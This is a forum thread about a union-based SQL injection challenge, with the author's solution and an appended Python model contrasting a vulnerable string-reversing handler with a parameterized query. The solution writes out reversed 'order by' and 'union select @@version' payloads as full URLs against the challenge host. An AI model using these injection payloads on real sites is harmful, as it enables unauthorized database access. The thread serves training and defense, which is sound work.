dancezar

Strange Sql injection challenge

Posted (edited)

Target: http://comyuycs.comli.com/sqli2.php?id=1

Task:

- Use union-based SQL injection

- Display your nick together with the version

- Do not give other hints; keep the solution for yourselves

Proof:


http://s9.postimg.org/y8j0cp5wf/sqli_me.png

Hint:VkZjeFNrMVZOVVZhZWxKYVlXdFZlbFJzVWtKT1JuQjBWMVJHWVZaRlZUQlhWbEpEWVVVMGVWTlVSazVTUmxWM1YyeFNRazFzY0hGWFZEQTk=

Solvers:

-Bitmap

-askwrite

-Bit-ul

-wHoIS

Edited by danyweb09
Posted
Easy level, thanks for the challenge. Next challenge?

Ok friend, send me the syntax and I'll put you on the solvers list. Next challenge for you? First this https://rstforums.com/forum/75984-easy-sql-injection-challenge.rst and then? :)) ..... this https://rstforums.com/forum/76012-hard-sql-injection.rst. If you want, try https://rstforums.com/forum/75620-sqli-challenge.rst and also https://rstforums.com/forum/75528-sqli-challenge.rst. Good luck.

Posted

All easy levels. Thanks for the challenges.

I'm waiting for the next challenges.

Posted


Very, very well thought-out challenge =d>

I can't send a PM with the syntax, but in the end that 'Hall of Fame' doesn't matter so much; what matters is the challenge itself, what I learned solving it, and the person who created it or wanted to make it public.

And whatever happened, I hope we'll hear from each other again on the forum.

Posted (edited)

Well done guys :) tomorrow I'll close the challenge and post the secret as well :))

Maybe someone else solves it by tomorrow.

Edit:

Challenge Closed

Congratulations to all participants

-Bitmap

-askwrite

-Bit-ul

-wHoIS

The solution was very simple and was in the HINT, namely: source code.

If you put `order by 1+--+` after `id=1` and looked in the page source, you got an error like this: "ion for the right syntax to use near 'yb redro 1' at line 1-". "yb redro 1" is reversed, which means that anything you enter after `id` gets flipped: if you put "mere" after `id`, the error shows up in the source and says "erem". How do we undo this process? Very simply: if we enter a word that is already reversed, read from right to left, PHP's `strrev` function reverses that word and brings it back to its normal form.

With that said, to count the columns we use: http://comyuycs.comli.com/sqli2.php?id=1%20yb%20redro%201. After the function reverses the word we get `order by 1`, and if we change it to `id=4 yb redro 1` we get the error `Unknown column '4'`, so there are 3 columns.

Then we do a union on 3 columns like this: http://comyuycs.comli.com/sqli2.php?id=3,2,1%20tceles%20noinu%200 and we get vulnerable column 2. We use the same procedure to pull the version: http://comyuycs.comli.com/sqli2.php?id=3,noisrev@@,1%20tceles%20noinu%200

Edited by danyweb09
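Added example (not from the thread or the challenge's own code): a Python/sqlite3 model of the handler described above, where the application reverses the `id` parameter (Python slicing stands in for PHP's `strrev`) and concatenates it into the query, next to a parameterized query that treats the same strings as plain values. The table, rows and column names are constructed; the challenge's real schema is unknown.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the challenge's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?, ?)",
        [(1, "alpha", "s1"), (2, "beta", "s2"), (3, "gamma", "s3")],
    )
    return conn


def reversed_concat_query(conn: sqlite3.Connection, user_id: str):
    """Model of the challenge's handler: the parameter is reversed
    ([::-1] stands in for PHP's strrev) and then concatenated into the
    SQL text. Reversal is obfuscation, not sanitisation: a payload typed
    backwards reaches the database forwards. Returns (sql, rows) so the
    caller can see exactly what was executed."""
    sql = "SELECT id, name, secret FROM items WHERE id=" + user_id[::-1]
    return sql, conn.execute(sql).fetchall()


def parameterized_query(conn: sqlite3.Connection, user_id: str):
    """Hardened handler: the value is bound as a parameter, so the
    database compares it as data and never parses it as SQL. A non-numeric
    string simply matches no INTEGER id."""
    sql = "SELECT id, name, secret FROM items WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # The probes from the thread, shown as the SQL that actually runs.
    for probe in ("1", "1 yb redro 1", "3,2,1 tceles noinu 0"):
        sql, rows = reversed_concat_query(conn, probe)
        print(f"vulnerable: {probe!r:>24} -> {sql!r} -> {rows}")
        print(f"hardened:   {probe!r:>24} -> {parameterized_query(conn, probe)}")
```

The concatenating handler turns `1 yb redro 1` into `... WHERE id=1 order by 1` and the union probe into a second SELECT, while the parameterized handler returns a row only for the plain `1`.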
